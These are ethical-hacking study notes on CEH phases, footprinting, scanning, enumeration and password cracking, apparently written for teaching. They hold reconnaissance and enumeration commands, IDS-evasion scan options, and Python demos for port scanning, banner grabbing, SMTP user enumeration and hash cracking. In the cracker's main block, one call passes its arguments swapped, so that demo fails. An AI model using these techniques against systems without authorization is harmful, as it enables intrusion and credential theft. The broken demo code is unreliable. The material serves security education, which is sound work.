ETHICAL HACKING
Complete Study Notes
Hacking Methodology | Footprinting | Scanning | Enumeration | System Hacking | Trojans | Black Box vs
White Box
UNIT 1: Introduction to Ethical Hacking
▶ 1.1 What is Ethical Hacking?
Ethical Hacking (also called Penetration Testing or White-Hat Hacking) is the practice of legally and
intentionally probing computer systems, networks, and applications to discover vulnerabilities before
malicious hackers can exploit them. An Ethical Hacker has explicit permission from the system owner
to attempt to breach security defenses.
Key Terms
Hacker A person who uses computer skills to gain unauthorized access to systems.
Not always malicious.
Cracker A malicious hacker who breaks into systems with criminal intent (damage,
theft, disruption).
Ethical Hacker A security professional hired to test systems using hacker techniques —
with permission.
Penetration Tester A professional who simulates cyberattacks to evaluate the security of a system.
Types of Hackers (Hat Classification)
Hat Type Description
White Hat Ethical hackers who test systems with permission to improve security.
Black Hat Malicious hackers who break into systems for personal gain or
destruction.
Grey Hat Hackers who operate between white and black — may exploit without
permission but disclose.
Script Kiddie Unskilled individuals who use existing tools/scripts without
understanding them.
Hacktivists Hackers driven by political or social motives (e.g., Anonymous).
State-Sponsored Government-backed hackers conducting cyber espionage or cyber
warfare.
Suicide Hacker Hackers who don't care about getting caught; attack for a cause
recklessly.
▶ 1.2 Hacking Methodology (CEH Framework)
The EC-Council Certified Ethical Hacker (CEH) methodology defines a structured process for ethical
hacking. It consists of 5 phases:
Phase Activity
Phase 1: Reconnaissance Gathering information about the target (passive & active).
Phase 2: Scanning Identifying open ports, services, OS, and vulnerabilities.
Phase 3: Gaining Access Exploiting vulnerabilities to enter the system.
Phase 4: Maintaining Access Keeping access via backdoors, rootkits, or trojans.
Phase 5: Covering Tracks Erasing evidence of the intrusion (logs, temp files).
Detailed Phase Breakdown
• Reconnaissance: Passive (OSINT, WHOIS, Google Dorking) + Active (port scanning, social engineering).
• Scanning: Network scanners (Nmap), vulnerability scanners (Nessus, OpenVAS), war dialing.
• Gaining Access: Exploiting buffer overflows, SQL injection, password cracking, session hijacking.
• Maintaining Access: Installing rootkits, trojans, creating backdoors.
• Covering Tracks: Clearing Windows event logs, modifying syslog, using anti-forensics tools.
▶ 1.3 Process of Malicious Hacking
A malicious hacker (Black Hat) follows a similar methodology but with criminal intent and without
authorization. Understanding this process helps defenders build better security systems.
Steps in Malicious Hacking
• Target Identification: Select a victim based on potential gain (financial, political, personal).
• Information Gathering: OSINT — social media, job postings, public records, WHOIS lookups, DNS records.
• Vulnerability Analysis: Map the target's tech stack and identify known CVEs or misconfigurations.
• Exploitation: Use automated tools (Metasploit, SQLmap) or custom exploits to breach the target.
• Payload Delivery: Drop malware, ransomware, keyloggers, RATs (Remote Access Trojans).
• Lateral Movement: Move through the internal network and escalate privileges (Pass-the-Hash, Kerberoasting).
• Data Exfiltration: Steal sensitive data over covert or encrypted channels (DNS tunneling, HTTPS).
• Covering Tracks: Delete logs, use anti-forensics tools, tamper with timestamps, install rootkits.
Key Distinction Ethical hackers work inside a written scope and rules of engagement, avoid damage and
data theft, and report every finding; post-exploitation steps such as exfiltration or log clearing happen
only when the scope explicitly allows them. Malicious hackers continue to exploit, exfiltrate, and cover
their tracks.
UNIT 2: Footprinting
▶ 2.1 What is Footprinting?
Footprinting (also called Reconnaissance) is the first and most critical phase of hacking. It involves
gathering as much information as possible about a target before launching an attack. The goal is to
create a complete profile of the target organization including its network, systems, employees, and
infrastructure.
Objectives of Footprinting
• Identify target's IP range and domain names.
• Discover network topology and architecture.
• Find employee names, roles, email IDs.
• Locate physical addresses and phone numbers.
• Identify OS, servers, and applications in use.
• Find open ports, services, and firewalls.
▶ 2.2 Types of Footprinting
Type Description & Examples
Passive Footprinting Gathering info without directly interacting with the target. Uses
public sources: OSINT, Google, WHOIS, social media, job boards.
Active Footprinting Directly interacting with the target. Examples: DNS queries,
traceroute, social engineering, port scanning.
▶ 2.3 Footprinting Techniques
A. Search Engine Footprinting
• Google Dorking: Use advanced operators: site:[Link], filetype:pdf, intitle:"index of", inurl:admin.
• Shodan: Search engine for internet-connected devices — reveals open ports, services, banners.
• LinkedIn/Social Media: Identify employees, tech stack from job postings, organizational structure.
B. WHOIS Lookup
WHOIS is a protocol that queries databases to find domain registration information.
• Reveals: Registrant name, org, email, phone, DNS servers, registration & expiry dates (registrant
details are often redacted since GDPR; the name servers and dates usually remain).
• Tools: [Link], [Link], [Link], IANA WHOIS.
◦ Command: whois [Link]
◦ whois on an IP address returns IP block ownership from the regional registry (ARIN, RIPE, APNIC).
C. DNS Footprinting
DNS (Domain Name System) records reveal critical infrastructure information.
Record Type Information Revealed
A Record Maps domain to IPv4 address.
AAAA Record Maps domain to IPv6 address.
MX Record Mail servers for the domain.
NS Record Authoritative name servers.
CNAME Canonical alias of a domain.
SOA Start of Authority — zone info, serial number.
TXT Record SPF, DKIM, verification strings.
PTR Record Reverse DNS — IP to hostname.
• Tools: nslookup, dig, host, DNSRecon, Fierce, [Link].
◦ dig [Link] ANY — asks for every record type; many servers now answer ANY with a minimal reply
(RFC 8482), so query A, AAAA, MX, NS and TXT individually when it returns little.
◦ Zone Transfer (AXFR): dig axfr @[Link] [Link] — dumps the whole zone when the name server is
misconfigured to allow transfers to anyone; try every NS record, not just the first.
D. Network Footprinting
• Traceroute: Maps the network path from source to target — reveals routers, hops, firewalls.
• Ping Sweep: ICMP echo requests to discover live hosts in a network range (hosts that drop ICMP
still show up to a TCP or ARP sweep).
• ASN Lookup: Identify the target's autonomous system number and the IP ranges it announces.
• Tools: tracert (Windows), traceroute (Linux), tcptraceroute, Path Analyzer Pro.
E. Email Footprinting
• Email Header Analysis: Reveals sender IP, mail servers, timestamps, routing path.
• Email Harvesting: Collect email addresses from websites, forums, breached databases.
• Tools: theHarvester, [Link], Maltego, [Link].
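Worked example of the header analysis above, added to these notes (it is not part of the original): walk the Received chain of a message to recover the relay path and the originating host. The message, hostnames, addresses and software names are constructed for the demo; nothing here is a real capture.

```python
"""Email header analysis: recover the relay chain from Received headers."""
import email
import ipaddress
import re

# Constructed sample message (not a real capture). Each MTA prepends its own
# Received header, so the topmost line is the last hop and the bottom one is
# the origin. Hostnames, addresses and X-Mailer are made up.
RAW_MESSAGE = b"""\
Received: from mx.inbound.example (mx.inbound.example [192.0.2.10])
\tby mail.recipient.example with ESMTPS id abc123;
\tMon, 01 Jan 2024 10:00:05 +0000
Received: from smtp.sender.example (unknown [198.51.100.7])
\tby mx.inbound.example with ESMTP id xyz789;
\tMon, 01 Jan 2024 10:00:03 +0000
Received: from [10.0.0.25] (helo=workstation.lan)
\tby smtp.sender.example with ESMTPA id def456;
\tMon, 01 Jan 2024 10:00:01 +0000
Message-ID: <20240101100001.1234@smtp.sender.example>
X-Mailer: Outlook 16.0
From: Alice <alice@sender.example>
To: bob@recipient.example
Subject: Quarterly report

Please see attached.
"""

RECEIVED_RE = re.compile(
    r"from\s+(?P<from>\S+)(?P<extra>.*?)\s+by\s+(?P<by>\S+)(?P<rest>.*?)(?:;\s*(?P<date>.*))?$"
)
IPV4_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip: str) -> bool:
    """True for private (RFC 1918) addresses: an internal address in a header
    means the sender's LAN numbering has leaked."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def parse_received_chain(raw: bytes) -> list:
    """Return hops in transit order (origin first), one dict per Received header."""
    msg = email.message_from_bytes(raw)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        text = re.sub(r"\s+", " ", value).strip()      # unfold continuation lines
        m = RECEIVED_RE.match(text)
        if not m:
            continue                                    # non-standard header, skip
        ip_match = IPV4_RE.search(m.group("from") + m.group("extra"))
        ip = ip_match.group(1) if ip_match else None
        hops.append({
            "from": m.group("from").strip("[]"),
            "ip": ip,
            "internal": is_rfc1918(ip) if ip else False,
            "by": m.group("by"),
            "date": (m.group("date") or "").strip(),
        })
    return hops


def client_fingerprint(raw: bytes) -> dict:
    """Headers that identify the sending software and internal naming."""
    msg = email.message_from_bytes(raw)
    mid = msg.get("Message-ID", "")
    chain = parse_received_chain(raw)
    return {
        "x_mailer": msg.get("X-Mailer"),
        "message_id_host": mid.strip("<>").rpartition("@")[2] or None,
        "origin": chain[0]["from"] if chain else None,
    }


if __name__ == "__main__":
    for i, hop in enumerate(parse_received_chain(RAW_MESSAGE), 1):
        flag = " (internal address!)" if hop["internal"] else ""
        print(f"hop {i}: {hop['from']} [{hop['ip']}] -> {hop['by']} at {hop['date']}{flag}")
    print(client_fingerprint(RAW_MESSAGE))
```

Only the hops added by servers you trust are reliable; an attacker controls every Received line below the first one added by your own MX, so treat the origin as a lead, not as proof.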
F. Website Footprinting
• Website Mirroring: HTTrack — download the entire website for offline analysis.
• Metadata Extraction: FOCA, ExifTool — extract hidden metadata from PDFs, images (author, GPS,
software).
• Wayback Machine: [Link] — view historical versions of websites (old admin paths, removed files).
• HTTP Headers: Reveal web server type (Apache/Nginx/IIS), scripting language, frameworks.
▶ 2.4 Footprinting Tools Summary
Tool Purpose
Maltego Graphical link analysis for OSINT — maps relationships between
domains, IPs, people.
theHarvester Email, subdomain, IP, and host enumeration from public sources.
Shodan Search engine for internet-connected devices and services.
Recon-ng Modular web reconnaissance framework (like Metasploit for recon).
FOCA Metadata extraction from documents and websites.
SpiderFoot Automated OSINT with 200+ modules for comprehensive footprinting.
Google Dorks Advanced search queries to find sensitive information indexed by
Google.
Nmap (light) Basic ping sweeps and host discovery in active footprinting.
UNIT 3: Scanning
▶ 3.1 What is Scanning?
Scanning is the second phase of hacking where attackers probe the target network to discover live
hosts, open ports, running services, OS versions, and potential vulnerabilities. Unlike passive
footprinting, scanning directly interacts with the target.
Types of Scanning
• Network Scanning: Discover active hosts and IP addresses in a network.
• Port Scanning: Find open TCP/UDP ports on target hosts.
• Vulnerability Scanning: Identify known security weaknesses, misconfigurations, unpatched software.
▶ 3.2 Port Scanning Techniques
Scan Type Description
TCP Connect Scan (-sT) Completes the full 3-way handshake. Reliable but easily
detected. Requires no special privileges.
SYN Stealth Scan (-sS) Sends SYN; if SYN-ACK is received, replies with RST instead of ACK.
Half-open — faster, and not logged by the application because no connection is
ever accepted, but plainly visible to any IDS. Requires root (raw sockets).
UDP Scan (-sU) Scans UDP ports. Slower — no connection confirmation. Used
for DNS(53), SNMP(161), TFTP(69).
NULL Scan (-sN) Sends a packet with no flags set. No response = open|filtered, RST = closed.
Works only against RFC 793-compliant stacks (most Unix); Windows answers
RST to every such probe, so every port looks closed.
FIN Scan (-sF) Sends a packet with only FIN set. Same open|filtered logic; slips past
some stateless packet filters that only block SYN.
Xmas Scan (-sX) Sets FIN, PSH, URG flags (lights up like a Christmas tree).
Same behavior, and the same Windows limitation, as NULL/FIN.
ACK Scan (-sA) Used to map firewall rules — determines if ports are filtered or
unfiltered.
Idle/Zombie Scan (-sI) Ultra-stealthy — uses a zombie host as intermediary. Attacker's
IP never appears in target logs.
Version Detection (-sV) Probes open ports to determine service name and version
number.
OS Detection (-O) Sends crafted packets and analyzes responses to determine
OS (TTL, TCP window size).
▶ 3.3 TCP 3-Way Handshake
Understanding TCP handshake is fundamental to understanding port scanning:
• Step 1 — SYN: Client sends a SYN (synchronize) packet to initiate the connection.
• Step 2 — SYN-ACK: Server responds with SYN-ACK if the port is open (accepts the connection).
• Step 3 — ACK: Client sends ACK to establish the connection. Port = OPEN.
If the server sends RST (Reset) → Port is CLOSED. No response → Port is FILTERED (a firewall dropped
the probe). A connect scan (-sT) completes all three steps; a SYN scan (-sS) stops after step 2 and
sends RST.
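The three outcomes above as a connect scan in Python, added here as an example (not code from the original notes or from Nmap). connect() runs the full handshake, so its result maps directly onto open, closed and filtered. The target is a constructed listener on localhost; no remote host is touched.

```python
"""TCP connect scan (nmap -sT): classify ports by how the handshake ends."""
import socket
import threading


def classify_port(host: str, port: int, timeout: float = 1.0) -> str:
    """connect() runs the full handshake (SYN -> SYN/ACK -> ACK).
    SYN/ACK came back  -> connect succeeds        -> "open"
    RST came back      -> ConnectionRefusedError  -> "closed"
    nothing came back  -> timeout                 -> "filtered" (dropped by a firewall)
    Because the connection is fully established the listening application
    sees it (accept() returns) and may log it; a SYN scan avoids that step."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "filtered"
        except OSError as exc:            # e.g. host or network unreachable
            return f"error:{exc.errno}"
        return "open"


def scan_ports(host: str, ports, timeout: float = 1.0) -> dict:
    """Return {port: state} for the given ports."""
    return {p: classify_port(host, p, timeout) for p in ports}


def start_listener(host: str = "127.0.0.1"):
    """Constructed target: an open port on localhost that accepts and drops
    each connection. Returns (server_socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))                   # port 0: let the OS pick a free port
    srv.listen(5)
    port = srv.getsockname()[1]

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:               # server socket was closed
                return
            conn.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, port


def free_closed_port(host: str = "127.0.0.1") -> int:
    """Find a port nothing listens on, so connecting to it draws an RST."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, open_port = start_listener()
    targets = [open_port, free_closed_port()]
    for port, state in scan_ports("127.0.0.1", targets).items():
        print(f"127.0.0.1:{port:<5} {state}")
    srv.close()
```

The filtered case cannot be shown on localhost (the loopback stack always answers); against a real firewall that drops packets the connect call simply times out, which is why scanners treat silence as "filtered" rather than "closed".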
▶ 3.4 Nmap — The Network Mapper
Nmap is the most widely used network scanner. Syntax: nmap [Scan Type] [Options] {target}
Nmap Command Purpose
nmap [Link] Basic scan — top 1000 ports.
nmap -sS -p- [Link] SYN scan of all 65535 ports.
nmap -sV -O [Link] Service version + OS detection.
nmap -A [Link]/24 Aggressive scan: OS, version, scripts, traceroute on
subnet.
nmap -sU -p 53,161 [Link] UDP scan of DNS and SNMP ports.
nmap --script vuln [Link] Run vulnerability detection scripts (NSE).
nmap -sn [Link]/24 Ping sweep — discover live hosts only, no port scan.
nmap -D RND:10 [Link] Decoy scan — uses random IPs as decoys to confuse
IDS.
▶ 3.5 Banner Grabbing
Banner grabbing is the process of collecting service banners that expose software name and version
information.
• Active Banner Grabbing: Connect to a service and capture the banner it returns.
• Passive Banner Grabbing: Capture banners from network traffic without connecting directly.
• Tools: telnet, netcat (nc), Nmap -sV, curl, wget, [Link].
◦ nc -v [Link] 80 → then type: HEAD / HTTP/1.0 followed by an empty line (the blank line ends the
request; without it the server keeps waiting and you see nothing).
◦ telnet [Link] 25 → the 220 greeting line is the SMTP banner.
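The nc/HEAD exchange above done programmatically, added as an example that is not part of the original notes: a raw-socket HEAD request, then parsing of the Server and X-Powered-By headers that leak software versions. The target is a constructed local HTTP server whose product names and versions are made up.

```python
"""Active banner grabbing: HEAD request over a raw socket, parse the reply headers."""
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def grab_http_banner(host: str, port: int, timeout: float = 3.0) -> dict:
    """Send exactly what you would type into nc: HEAD / HTTP/1.0, a Host header,
    and the blank line that terminates the request. Returns the status line
    plus the headers that usually leak software and version."""
    request = f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        raw = b""
        while b"\r\n\r\n" not in raw:          # read until the end of the headers
            chunk = s.recv(4096)
            if not chunk:
                break
            raw += chunk
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {
        "status": status,
        "server": headers.get("server"),            # e.g. Apache/2.4.41 (Ubuntu)
        "powered_by": headers.get("x-powered-by"),  # e.g. PHP/7.4.3
        "headers": headers,
    }


class _ChattyHandler(BaseHTTPRequestHandler):
    """Constructed target: a server that advertises its stack.
    Product names and versions are invented for the demo."""
    server_version = "Apache/2.4.41"
    sys_version = "(Ubuntu)"

    def do_HEAD(self):
        self.send_response(200)                 # also emits Server: and Date:
        self.send_header("X-Powered-By", "PHP/7.4.3")
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, *args):              # keep the demo quiet
        pass


def start_chatty_server(host: str = "127.0.0.1"):
    """Returns (server, port); stop it with server.shutdown()."""
    srv = HTTPServer((host, 0), _ChattyHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_chatty_server()
    banner = grab_http_banner("127.0.0.1", port)
    print(banner["status"], "|", banner["server"], "|", banner["powered_by"])
    srv.shutdown()
```

Banners are self-reported and easily faked (Apache's ServerTokens, reverse proxies that rewrite Server), so a version read this way is a hypothesis to confirm with behaviour-based probes such as Nmap -sV, not a finding by itself.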
▶ 3.6 Vulnerability Scanning
Vulnerability scanners automate the process of identifying known security weaknesses.
Tool Description
Nessus Industry-leading commercial vulnerability scanner. Detects CVEs,
misconfigs, missing patches.
OpenVAS Open-source vulnerability scanner — free alternative to Nessus.
Nikto Web server vulnerability scanner — checks for dangerous files,
outdated software, misconfigs.
Qualys Cloud-based vulnerability management platform.
Metasploit Exploitation framework with built-in vulnerability scanning via auxiliary
modules.
▶ 3.7 Evasion Techniques During Scanning
• Fragmentation: Split probes into tiny IP fragments (Nmap -f) so a signature-based IDS/IPS that does not
reassemble cannot match them.
• Decoy Scanning: Use multiple fake IP addresses alongside the real attacker IP (Nmap -D).
• Source IP Spoofing: Forge the source IP to hide the attacker's identity; replies then go to the spoofed
address, so on its own this only adds noise (the idle scan is the exception).
• Slow Scanning: Send packets very slowly over hours (Nmap -T0/-T1) to stay under rate-based detection
thresholds.
• Idle/Zombie Scan: Bounce the scan off a third-party host with predictable IP ID increments (Nmap -sI).
• Protocol/Port Manipulation: Use protocols or source ports the firewall trusts (e.g., Nmap -g 53 or
--source-port 53) to pass rules written for DNS or web traffic.
UNIT 4: Enumeration
▶ 4.1 What is Enumeration?
Enumeration is the process of extracting detailed, actionable information from target systems after
discovery. Unlike scanning which identifies open doors, enumeration walks through those doors to
collect usernames, group names, machine names, network shares, services, and configurations. This is
typically an active interaction with the target system.
Key Difference Scanning finds what is open/running. Enumeration extracts the actual
data/resources exposed by those open services.
▶ 4.2 Information Gathered via Enumeration
• User accounts and group memberships.
• Machine names, hostnames, computer names on network.
• Network shares and printers.
• Routing tables and ARP tables.
• Service/application banners and versions.
• Auditing and security policies (password policies, lockout policies).
• SNMP community strings.
• VPN, RPC, NFS exports.
▶ 4.3 Enumeration Techniques by Protocol
A. NetBIOS Enumeration
NetBIOS (Network Basic Input/Output System) allows applications on different computers to
communicate over a LAN. It runs on port 137 (UDP), 138 (UDP), 139 (TCP).
• Reveals: Computer name, workgroup, MAC address, logged-in users, shared resources.
• Tools: nbtstat, nbtscan, Hyena, [Link].
◦ nbtstat -A [Link] → Shows the NetBIOS name table of a remote machine (Windows).
◦ nbtscan [Link]/24 → Scans the entire subnet for NetBIOS names.
B. SNMP Enumeration
SNMP (Simple Network Management Protocol) manages network devices. Uses community strings as
passwords. Default: 'public' (read) and 'private' (write). Runs on UDP port 161.
• Reveals: System info, interfaces, routing tables, ARP table, running processes, installed software.
• MIB (Management Information Base): Tree-structured database of the objects an SNMP agent exposes,
each addressed by an OID.
• Tools: snmpwalk, snmp-check, Metasploit, SolarWinds MIB Browser.
◦ snmpwalk -v2c -c public [Link] → Walks the whole MIB tree.
◦ snmp-check [Link] -c public → Detailed SNMP enumeration.
SNMPv1/v2c send the community string in cleartext and have no real authentication; v3 adds users,
authentication and encryption. A device still answering v2c with a default string is a finding in itself.
C. LDAP Enumeration
LDAP (Lightweight Directory Access Protocol) is used to access directory services like Active Directory.
Runs on port 389 (LDAP) and 636 (LDAPS).
• Reveals: Users, groups, OUs (Organizational Units), domain info, password policy.
• Tools: ldapsearch, JXplorer, Softerra LDAP Browser, [Link].
◦ ldapsearch -x -H ldap://[Link] -b 'dc=target,dc=com' → anonymous simple bind. Active Directory
normally rejects anonymous searches, so add -D 'user@domain' -W: any low-privileged domain account
can read most of the directory.
D. NTP Enumeration
NTP (Network Time Protocol) synchronizes clocks. Runs on UDP port 123. Older ntpd versions (before
4.2.7p26) honor the monlist command, which returns the last 600 clients; because the reply is far larger
than the request it is also the basis of NTP DDoS amplification, so most servers now disable it.
• Reveals: Hosts that have synchronized with the NTP server — active hosts in the network.
• Tools: ntpdc, ntptrace, Nmap NTP scripts (ntp-info, ntp-monlist).
◦ ntpdc -c monlist [Link] → Reveals recent clients.
E. SMB/CIFS Enumeration
SMB (Server Message Block) is used for file sharing. Runs on port 445 (direct) and 139 (via NetBIOS).
Critical for Windows network enumeration.
• Reveals: Shared folders, user lists, group policies, OS version, domain info.
• Tools: enum4linux, smbclient, Metasploit, CrackMapExec, [Link].
◦ enum4linux -a [Link] → Full SMB enumeration including users and shares (null session).
◦ smbclient -L //[Link]/ -N → List shares anonymously (-N: no password).
F. DNS Enumeration
• Zone Transfer (AXFR): Transfer the entire DNS zone — reveals all hostnames and IPs.
• Brute Force: Try common subdomain names (mail, vpn, dev, admin, test).
• Tools: DNSRecon, Fierce, dnsmap, Sublist3r, [Link].
◦ dnsrecon -d [Link] -t axfr → Attempt a zone transfer against each name server.
◦ fierce --domain [Link] → Brute-force subdomains.
G. SMTP Enumeration
SMTP (Simple Mail Transfer Protocol) on port 25 can reveal valid email usernames via VRFY and
EXPN commands.
• VRFY command: Verifies whether a user exists (VRFY admin → 250 if the user exists, 550 if not, 252 if
the server refuses to say).
• EXPN command: Expands mailing lists to reveal member addresses.
• RCPT TO fallback: When VRFY/EXPN are disabled, RCPT TO:<user@domain> after a MAIL FROM still
answers 250 or 550 per recipient on many servers.
• Tools: smtp-user-enum (-M VRFY|EXPN|RCPT), Metasploit smtp_enum module, Nmap smtp-enum-users script.
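The VRFY exchange above, with the RCPT TO fallback, as a worked example added here (it is not code from the original notes or from smtp-user-enum). Both sides are shown: a constructed fake MTA with an invented account list, and a probe client that switches method when the server answers 252. A second handler class mimics a hardened server.

```python
"""SMTP user enumeration: VRFY with RCPT TO fallback, against a constructed fake MTA."""
import socket
import socketserver
import threading

VALID_USERS = {"admin", "postmaster", "alice"}     # constructed account list


class FakeSMTP(socketserver.StreamRequestHandler):
    """Constructed target MTA. Subclass with vrfy_enabled=False to mimic a
    hardened server that answers 252 to every VRFY."""
    vrfy_enabled = True

    def reply(self, text):
        self.wfile.write((text + "\r\n").encode())

    def handle(self):
        self.reply("220 mail.target.example ESMTP (constructed)")
        have_sender = False
        while True:
            line = self.rfile.readline()
            if not line:
                return
            verb, _, arg = line.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                self.reply("250 mail.target.example")
            elif verb == "VRFY":
                if not self.vrfy_enabled:
                    self.reply("252 2.5.2 Cannot VRFY user; try RCPT")
                elif arg.lower() in VALID_USERS:
                    self.reply(f"250 2.1.5 <{arg.lower()}@target.example>")
                else:
                    self.reply("550 5.1.1 User unknown")
            elif verb == "MAIL":
                have_sender = True
                self.reply("250 2.1.0 OK")
            elif verb == "RCPT":
                if not have_sender:
                    self.reply("503 5.5.1 Need MAIL first")
                    continue
                user = arg.partition(":")[2].strip("<> ").split("@")[0].lower()
                self.reply("250 2.1.5 OK" if user in VALID_USERS else "550 5.1.1 User unknown")
            elif verb == "QUIT":
                self.reply("221 2.0.0 Bye")
                return
            else:
                self.reply("502 5.5.2 Command not implemented")


class HardenedSMTP(FakeSMTP):
    vrfy_enabled = False


def start_fake_mta(handler=FakeSMTP, host="127.0.0.1"):
    srv = socketserver.ThreadingTCPServer((host, 0), handler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


class SMTPProbe:
    """Minimal line-oriented client; each command returns (code, reply line).
    Uses HELO because real EHLO replies span several lines."""
    def __init__(self, host, port, timeout=3.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.lines = self.sock.makefile("rb")
        self.banner = self._readline()            # the 220 greeting
    def _readline(self):
        return self.lines.readline().decode(errors="replace").rstrip("\r\n")
    def cmd(self, line):
        self.sock.sendall((line + "\r\n").encode())
        reply = self._readline()
        return int(reply[:3]), reply
    def close(self):
        try:
            self.cmd("QUIT")
        finally:
            self.sock.close()


def enumerate_users(host, port, candidates, domain="target.example"):
    """Return (sorted valid users, method used). 250 = exists, 550 = unknown,
    252 = server will not verify, so fall back to RCPT TO after a MAIL FROM."""
    probe = SMTPProbe(host, port)
    probe.cmd("HELO scanner.local")
    found, method = [], "VRFY"
    for user in candidates:
        code, _ = probe.cmd(f"VRFY {user}")
        if code == 252:
            method = "RCPT"
            break
        if code == 250:
            found.append(user)
    if method == "RCPT":
        found = []
        probe.cmd("MAIL FROM:<probe@scanner.local>")
        for user in candidates:
            code, _ = probe.cmd(f"RCPT TO:<{user}@{domain}>")
            if code == 250:
                found.append(user)
    probe.close()
    return sorted(found), method
```

Every probe leaves a line in the mail log, and a burst of VRFY or RCPT for users that do not exist is exactly what mail-server rate limiting and SIEM rules look for; keep candidate lists short and spaced out on a real engagement.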
▶ 4.4 Enumeration Tools Summary
Tool Protocol/Purpose
enum4linux SMB/NetBIOS — comprehensive Windows/Samba enumeration.
nbtstat NetBIOS — shows name table, cache, and statistics.
snmpwalk SNMP — walks SNMP MIB tree to extract all data.
ldapsearch LDAP/Active Directory — query directory services.
rpcclient RPC — enumerate users, shares, printers via MS-RPC.
CrackMapExec SMB — mass enumeration and lateral movement tool.
Metasploit Various — auxiliary modules for all enumeration types.
PowerView Active Directory — powerful AD enumeration via PowerShell.
UNIT 5: System Hacking
▶ 5.1 What is System Hacking?
System Hacking involves gaining unauthorized access to computer systems by exploiting vulnerabilities
identified during the scanning and enumeration phases. The goal is to gain control over target systems,
escalate privileges, and maintain persistent access.
▶ 5.2 System Hacking Phases (CEH)
Phase Goal
Password Cracking Obtain valid credentials to authenticate.
Privilege Escalation Gain higher (admin/root) level access.
Executing Applications Run malicious code, install backdoors/keyloggers.
Hiding Files Conceal malicious files using steganography, ADS.
Covering Tracks Erase evidence of intrusion from logs.
▶ 5.3 Password Cracking
Password cracking is the process of recovering passwords from stored or transmitted hashes.
Password Attack Types
• Dictionary Attack: Try words from a wordlist (e.g., [Link]). Fast but limited by the wordlist.
• Brute Force Attack: Try all possible character combinations. Guaranteed to succeed given enough
time, but very slow.
• Rule-Based Attack: Apply transformation rules to a wordlist (capitalize, append numbers, l33t-speak).
• Rainbow Table Attack: Pre-computed hash tables for fast lookup. Defeated by salting.
• Mask Attack: Brute-force only the unknown positions when the password structure is partly known
(e.g., 4 letters + 4 digits).
• Hybrid Attack: Combine dictionary + brute force.
• Credential Stuffing: Replay leaked username/password pairs from data breaches against other sites.
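Worked example of the attack types above, added here and not part of the original notes: a tiny cracker that runs dictionary, rule-based and mask attacks against fast hashes, plus a precomputed lookup table standing in for a rainbow table, to show concretely why a salt breaks the table and a slow KDF breaks the throughput. The wordlist and target passwords are constructed for the demo.

```python
"""Offline password cracking: dictionary, rules, mask, and why salt and slow hashes matter."""
import hashlib
import itertools
import string

WORDLIST = ["password", "letmein", "summer", "welcome", "dragon"]  # constructed stand-in for a leaked list


def hash_password(password: str, algo: str, salt: bytes = b"") -> str:
    """Fast digest, optionally salted: what weak password stores hold."""
    return hashlib.new(algo, salt + password.encode()).hexdigest()


def mangle(word: str):
    """Rule-based attack: cheap transformations users actually apply."""
    for w in sorted({word, word.lower(), word.capitalize(), word.upper()}):
        yield w
        for suffix in ("1", "123", "!", "2024"):
            yield w + suffix
        yield w.translate(str.maketrans("aeios", "43105"))      # l33t-speak


def precompute_table(words, algo: str) -> dict:
    """Rainbow-table stand-in: hash -> plaintext, built once, reused for every
    unsalted target. A real table trades storage for time with chains; the
    defensive lesson is identical."""
    return {hash_password(c, algo): c for w in words for c in mangle(w)}


def crack_with_table(target: str, table: dict):
    return table.get(target)


def crack_with_rules(target: str, words, algo: str, salt: bytes = b""):
    """Dictionary + rules. With a salt the hashing must be redone per target."""
    for w in words:
        for candidate in mangle(w):
            if hash_password(candidate, algo, salt) == target:
                return candidate
    return None


MASK_SETS = {"?l": string.ascii_lowercase, "?u": string.ascii_uppercase,
             "?d": string.digits, "?s": "!@#$%"}


def mask_attack(target: str, algo: str, mask: str):
    """Mask attack: brute-force only the positions the pattern leaves open."""
    tokens = [mask[i:i + 2] for i in range(0, len(mask), 2)]
    for combo in itertools.product(*(MASK_SETS[t] for t in tokens)):
        candidate = "".join(combo)
        if hash_password(candidate, algo) == target:
            return candidate
    return None


def slow_salted_hash(password: str, salt: bytes, iterations: int = 200_000) -> str:
    """What a password store should do: unique salt + a deliberately slow KDF.
    Each guess now costs `iterations` HMAC rounds and the table trick is gone."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


if __name__ == "__main__":
    table = precompute_table(WORDLIST, "md5")
    print("unsalted md5 via table:", crack_with_table(hash_password("Summer2024", "md5"), table))
    salt = b"\x9a\x01"
    salted = hash_password("Summer2024", "sha256", salt)
    print("salted sha256 via table:", crack_with_table(precompute_table(WORDLIST, "sha256"), salted))
    print("salted sha256 via rules:", crack_with_rules(salted, WORDLIST, "sha256", salt))
    print("mask ?l?l?d?d:", mask_attack(hash_password("ab42", "md5"), "md5", "?l?l?d?d"))
```

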